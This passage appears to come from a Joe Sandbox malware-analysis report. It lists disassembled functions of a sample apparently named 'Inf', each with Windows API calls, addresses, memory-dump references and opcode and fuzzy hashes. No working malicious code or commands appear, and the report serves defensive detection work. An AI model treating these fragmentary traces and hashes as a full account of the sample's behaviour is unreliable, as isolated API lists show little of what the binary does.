                                                                                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750936
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750944
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?), ref: 00750954
                                                                                                                                                                                                                                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750960
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                              • Opcode ID: dfcca8f87b71f4637e6cbfe51623b8f873473dd13fde7692074e7687d17fe89a
                                                                                                                                                                                                                                                                              • Instruction ID: 640ba29fb1d62c38dacb9f8d429bfb148aa004984dad23e6835f9c1a84435e64
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfcca8f87b71f4637e6cbfe51623b8f873473dd13fde7692074e7687d17fe89a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6001DF76600204AFEB204F54CC08BDA7BADEF44762F244024FD05E2215E7B8ED009BE0
                                                                                                                                                                                                                                                                              Function 0075F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0075F2AE
                                                                                                                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 0075F2BC
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 0075F2C4
                                                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0075F2CE
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32 ref: 0075F30A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                              • Opcode ID: 1b26296843f3c4e5edeb8e2eeab59b55ca6a7a487fb770ef187b1412d651d752
                                                                                                                                                                                                                                                                              • Instruction ID: 45dbb81ddc7323d2bbf3c0b4c0a7cb2eca84c9d3f01a2830ad5411841263c6bc
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b26296843f3c4e5edeb8e2eeab59b55ca6a7a487fb770ef187b1412d651d752
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D01A970C0161DDBDF10AFA4E84CAEEBB78FF08312F014466E901B2290DBB89958C7A5
                                                                                                                                                                                                                                                                              Function 00751A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00751A60
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A6C
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A7B
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A82
                                                                                                                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00751A99
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 842720411-0
                                                                                                                                                                                                                                                                              • Opcode ID: e26b6ceba45f2aa4f1e197b4854eb2e65643160c38438cff20d55965c2b22cbf
                                                                                                                                                                                                                                                                              • Instruction ID: f470e6022fcc5dcff771e42c197572ce595a89e6cab621ee13a517ff019fbaad
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e26b6ceba45f2aa4f1e197b4854eb2e65643160c38438cff20d55965c2b22cbf
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 340181B5641209BFDB224FA4DC48EAA3B6DEF843A5F618414FC45C32A0DA75DC408B60
                                                                                                                                                                                                                                                                              Function 00751960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00751976
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00751982
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00751991
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00751998
                                                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007519AE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                                                                                                                              • Opcode ID: 0ff9b54fbf79378a2f305faaa94bc6e6cb3f2646546cf50fc0000df70c4249ec
                                                                                                                                                                                                                                                                              • Instruction ID: a68c834d288af3231130dbaa3071bf218f04346efc8c8852cd054b8e6d906219
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ff9b54fbf79378a2f305faaa94bc6e6cb3f2646546cf50fc0000df70c4249ec
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F04F75240305ABD7214FA4EC59F963B6DEF897A2F214414FD45C7290CB78EC00CB60
                                                                                                                                                                                                                                                                              Function 00751900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00751916
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00751922
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00751931
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00751938
                                                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0075194E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                                                                                                                              • Opcode ID: 96786f5818e55801447645e5111174ab24147f4bcb3215e6a1576d6fb6a10631
                                                                                                                                                                                                                                                                              • Instruction ID: c814115a1e17293759c8f9d6825b47234f2eafd00716a3af1d5c0a4dcd8870ce
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96786f5818e55801447645e5111174ab24147f4bcb3215e6a1576d6fb6a10631
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1F04F75240345ABDB210FA5AC5DF963B6DEF897A2F614414FA45D7290CB78EC00CB64
                                                                                                                                                                                                                                                                              Function 00760CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CCB
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CD8
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CE5
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CF2
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CFF
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760D0C
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                              • Opcode ID: 5d624acd807228f291fb82124e94b4560ded900fbb33a4fa0ccbeaa5599e3ac9
                                                                                                                                                                                                                                                                              • Instruction ID: 89e6c3972148489b07a3d25780987d81040d08c7b13564ab21224d3e98b59891
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d624acd807228f291fb82124e94b4560ded900fbb33a4fa0ccbeaa5599e3ac9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0019C71800B15DFCB30AFA6D980817FBF9BF602153158A3ED59752961C7B4A948DF90
                                                                                                                                                                                                                                                                              Function 007565AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007565BF
                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 007565D6
                                                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 007565EE
                                                                                                                                                                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 0075660A
                                                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00756624
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                              • Opcode ID: dcb04b6a799a5b96b85fbe0ff3754d22b0f2e1c96013199b4975821a119dd651
                                                                                                                                                                                                                                                                              • Instruction ID: 47eb3e41492cc647b7d84b666ce9f974e718d13398cf9bf642a52bf6dae1e7dc
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcb04b6a799a5b96b85fbe0ff3754d22b0f2e1c96013199b4975821a119dd651
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78018670540308ABEB305F10DD4EFD67B78FF00746F404659A586620E1EBF8AE988B95
                                                                                                                                                                                                                                                                              Function 00722610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072262E
                                                                                                                                                                                                                                                                                • Part of subcall function 00722D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0072DB51,007C1DC4,00000000,007C1DC4,00000000,?,0072DB78,007C1DC4,00000007,007C1DC4,?,0072DF75,007C1DC4), ref: 00722D4E
                                                                                                                                                                                                                                                                                • Part of subcall function 00722D38: GetLastError.KERNEL32(007C1DC4,?,0072DB51,007C1DC4,00000000,007C1DC4,00000000,?,0072DB78,007C1DC4,00000007,007C1DC4,?,0072DF75,007C1DC4,007C1DC4), ref: 00722D60
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00722640
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00722653
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00722664
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00722675
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                              • Opcode ID: 175c3ef8178a805d802522bd4bd1eb13fd8e7cd09ce5b913d94afa74d5c62485
                                                                                                                                                                                                                                                                              • Instruction ID: ef82b257078472c70a6ce4c636c9155a57b8fde1fd544fc4c8c8a5783b0109e1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 175c3ef8178a805d802522bd4bd1eb13fd8e7cd09ce5b913d94afa74d5c62485
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F0DA71946230AB8612AF54FC05D483B64FF29752385CA2EF41496277DB3D8903AF8C
                                                                                                                                                                                                                                                                              Function 007212B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: __freea$_free
                                                                                                                                                                                                                                                                              • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                              • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                              • Opcode ID: 15f2450c95995db6c6bb160399ed18f075357a40190c1d4bba7cbb0e2a10f704
                                                                                                                                                                                                                                                                              • Instruction ID: 90839d5e0a2142a7a7832a7dd43527d3c6ab76abe71edc1c662009671614023d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15f2450c95995db6c6bb160399ed18f075357a40190c1d4bba7cbb0e2a10f704
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67D15771900266CBCB249F68E849BFEB7B1FF75300FA8415AE9069B651D73D8D80CB90
                                                                                                                                                                                                                                                                              Function 00775231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 007641FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007752EE,?,?,00000035,?), ref: 00764229
                                                                                                                                                                                                                                                                                • Part of subcall function 007641FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007752EE,?,?,00000035,?), ref: 00764239
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00775419
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0077550E
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 007755CD
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                                                                                                                              • String ID: bnu
                                                                                                                                                                                                                                                                              • API String ID: 2854431205-1862469062
                                                                                                                                                                                                                                                                              • Opcode ID: 933b7ae16977a697a278b4ac1f158187ec9ed3bb1a817e15d53982c83cc57465
                                                                                                                                                                                                                                                                              • Instruction ID: 3b7f75bf9d68fb109eb98d63a17de6a9bf3362dc09808fadd978cff7fd49575d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 933b7ae16977a697a278b4ac1f158187ec9ed3bb1a817e15d53982c83cc57465
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5D17D7090024DDFCB44DF94C894AEDBBB5FF08304F54815DE50AAB2A2DB75AA86CF90
                                                                                                                                                                                                                                                                              Function 006FCF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 006FD253
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                              • String ID: t5|$t5|$t5|
                                                                                                                                                                                                                                                                              • API String ID: 1385522511-932572448
                                                                                                                                                                                                                                                                              • Opcode ID: 2960621c73ff88affb49be7419d4810145d306a57bca5202c3664b282e924030
                                                                                                                                                                                                                                                                              • Instruction ID: 3857219c259be2e867b854bfabe43e34c45961edca00490e4ff4313dcd1b8518
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2960621c73ff88affb49be7419d4810145d306a57bca5202c3664b282e924030
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49912AB5A0020ADFCB14CF68D490AB9B7F3FF59314F24816EDA459B341D735AA82DB90
                                                                                                                                                                                                                                                                              Function 007761A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
